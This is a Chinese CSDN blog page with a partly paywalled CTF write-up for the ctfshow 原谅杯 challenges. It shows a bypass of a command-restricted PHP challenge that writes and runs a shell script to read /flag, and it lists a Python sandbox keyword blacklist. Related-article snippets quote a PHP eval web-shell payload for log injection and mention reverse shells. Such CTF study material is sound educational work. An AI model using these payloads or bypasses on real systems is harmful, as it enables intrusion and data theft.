ctfshow 原谅杯

最新推荐文章于 2024-05-25 15:23:03 发布
VIP文章 最新推荐文章于 2024-05-25 15:23:03 发布
阅读量666 收藏
点赞数 1
分类专栏: CTF题目 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/120198844
版权

原谅4

这是提示。

老前辈说过“最安全的系统就是什么都没有”,我把没用的命令都删了,看你还怎么执行
你知道系统环境变量里的PATH是干什么的吗?

查看phpinfo发现禁用了很多东西,根据提示,查看$PATH
echo $PATH
然后到各路径下查看
然后查看/bin
发现只有三个命令,ls rm sh
所以这里我们可以执行shell脚本

echo -e "%23!/bin/sh\nwhile read LINE\ndo\necho \$LINE\ndone < /flag" > readflag
sh readflag

原谅5_fastapi2

hint1:https://ctfshow.lanzoui.com/iKaushwaoyh
hint2:为了防止偷看我把变量都改了名字,还把关键词的黑名单挪到了函数外面。
hint3:给你过滤的关键词又如何,['import', 'open', 'eval', 'exec', 'class', ''', '"', 'vars', 'str', 'chr']。web入门里的知识点,换成python了而
最低0.47元/天 解锁文章
Anfy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow-原谅杯(1-4)
i_kei的博客
11-12 1007
原谅1 下载题目,里面有一张图片和一个压缩包 查看图片,因为压缩包是加密的,猜测表情就是压缩包密码 1317???7?? 中间有几个不确定是什么,尝试掩码攻击后发现失败,之后经过提示,倒数第二个是啤酒=p9,占两个字符。。。 将掩码改为1317???7p9?(?为英文字符) 爆出来口令为1317bi77p9u 看到图片隐写首先 ...
CTFshow——原谅杯WP—原谅1
hahaha233330的博客
11-12 434
今天光棍节,还要发这种东西迫害single dog。。。 原谅1 题目打开是一个压缩包和一张图片,坑人,就是谐音“1317bi77p9u”,得到压缩包解压密码。 文本内容如下: 大概一个月前,闲鱼上有个人找到我,希望我能帮忙做一个求婚视频。在和他沟通的过程中,知道他为这次的求婚准备了很久,甚至于半夜我给他看成品的时候,他还在布置场地,那个时候,离他的求婚还有28天。 在和他的沟通过程中,能感受到他对女生的珍视。他能细致地讲出每一张照片背后发生的故事,当时的心情和她的情绪。我一边帮他剪视频,一边感受着他
ctfshow原谅
记录学习,一起进步
05-24 1319
cyfshow原谅
[原谅杯]Web部分WP
Y4tacker的博客
11-23 1260
前言 看到群里又那么多小伙伴想要一份WP,那就写一下吧,其实在我的网站上也有,只是比较简陋,这里比较详细的写一份吧,希望大家一起加油!!! 开始写了预计今晚完成
原谅5_fastapi2(fastapi)
qq_44657899的博客
01-02 904
文章目录了解fastapi题解 了解fastapi fastapi的官方文档:https://fastapi.tiangolo.com/zh/ 根据官方文档所说,fastapi是一个web框架,感觉和flask差不多 然后下载fastapi试试: pip install fastapi pip install uvicorn 安装好之后把文档里的示例代码运行一下 main.py 运行: uvicorn main:app --reload 看到了和文档差不多的结果,然后访问http://127.0
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow pwn4
qq_39980610的博客
08-22 627
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow web4
stantic的博客
05-09 1541
提示日志注入,文件包含;还有一个get方式的参数url, 有nginx,那就试试它的默认日志目录 日志默认路径: (1) apache+Linux 日志默认路径 /etc/httpd/logs/access_log /var/log/httpd/access_log (2) apache+win2003 日志默认路径 D:\xampp\apache\l...
2020.11.11 CTFshow原谅杯部分wp
晚安這個未知的世界
11-11 1271
原谅杯部分wp 原谅1 压缩包有密码,把图片的内容猜测出来就能解压压缩包 根据群里面的大佬们给出了太多提示了 前4位是1317,????是p9,表情是i,最后一位是u,剩下的直接用?来表示,然后用ARCHPR进行掩码攻击爆破zip 直接获得解压密码为1317bi77p9u 解压后获得一张图和一个狗血剧情的开头文本 图片直接用stegsolve可以看到flag flag{ctfshow_green_hat} 原谅2 题目附件下载下来就已经有密码了,真的好家伙 虽然压缩包被加密了,但是发现里面h
菜鸡的web之旅 ctfshow web4
Lig_HossssT的博客
10-29 180
日志注入User-agent:xxxx <?php @eval($_POST[a]);?> xxx
CTFSHOW WEB练习
qq_51558360的博客
05-30 1160
web1 分析:需要满足id=1000,同时intval($id) > 999要返回false(intval是将变量取整(注:如果变量是小数,那么变量小数位不能为0,如果为0,会被认为是整数)) 方法一:使用’1000’字符串('1000’进行intval后还是1000) 方法二:125<<3(注8000>>3不行) 方法三:使用680|320 方法四:使用hex(16进制绕过) intval使用举例 <?php echo intval(42);
【Web】CISCN 2024初赛 题解(全)
uuzeray的博客
05-21 1328
这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹。注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错。再打sqlite,指定tableName,加载写入的恶意so文件,反弹shell。最后注意要将获取的变量元组转字符串,再用逗号分隔,依次输出,从而绕过seed。考的python栈帧沙箱逃逸,获取到外部的栈帧,就可以用。因为ban了引号,考虑hex2bin,将数字转为字符串。
uniapp高校二手书交易商城回收系统 微信小程序python+java+node.js+php
QQ1304979694的博客
05-24 509
每年因为有大量的学生在接受教育,每到大学毕业季的时候,所使用的大量书籍对他们自己来说,很多是没有用,同时由于书籍多和不方便携带,导致很多大学生在毕业时将教材直接丢弃是在校大学生处理已用教材的一种主要方式。基于上述因素,同时随着校园环保热潮、倡导绿色校园等号召兴起,所以设立二手书交易小程序是很必要的,一个可以提供给想将书卖出去的人,以及想购买二手书的学生一个平台,方便更好的进行资源再利用、减轻学生的经济负担、促进高校二手书的流通,共建绿色校园。开发出一种实用性强,可靠性好,操作便捷的校园二手书交易小程序。
【全开源】沃德商协会管理系统源码(FastAdmin+ThinkPHP+Uniapp)
最新发布
u011092458的博客
05-25 660
一款基于FastAdmin+ThinkPHP+Uniapp开发的商协会系统,新一代数字化商协会运营管理系统,以“智慧化会员体系、智敏化内容运营、智能化活动构建”三大板块为基点,实施功能全场景覆盖,一站式解决商协会需求壁垒,有效快速建立自有数字化管理体系、提升组织管理效能、增强会员粘性、沟通连接市场,真正做到为构建有影响力的现代化智慧型组织赋能。数据决策支持:沃德商协会管理系统源码提供的数据统计和分析功能,为商协会提供了宝贵的决策支持,帮助商协会更好地了解市场需求和会员需求,制定更精准的发展战略。
【全开源】知识库文档系统源码(ThinkPHP+FastAdmin)
2401_84414018的博客
05-24 545
知识库文档系统源码是一套完整的软件开发代码,用于构建功能强大的知识库文档系统。该系统通过整合文档管理、搜索、分类、版本控制等功能,帮助用户实现知识的集中存储、快速检索和有效利用。无论是企业内部的知识管理,还是个人学习资料的整理,知识库文档系统源码都能提供强大的支持。知识库文档系统源码是构建智慧知识库的基石,它为用户提供了一个高效、便捷的知识管理平台。通过选择和部署合适的源码项目,用户可以轻松实现知识的集中存储、快速检索和有效利用,为事业发展提供有力支持。
ctfshow渔人杯
09-14
ctfshow渔人杯是一个CTF(Capture The Flag)比赛,它是以网络安全为主题的竞赛。在这个比赛中,参赛者需要解决各种网络安全相关的问题,包括密码学、漏洞利用、逆向工程等。比赛的目标是通过获取旗帜(flag)来获得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值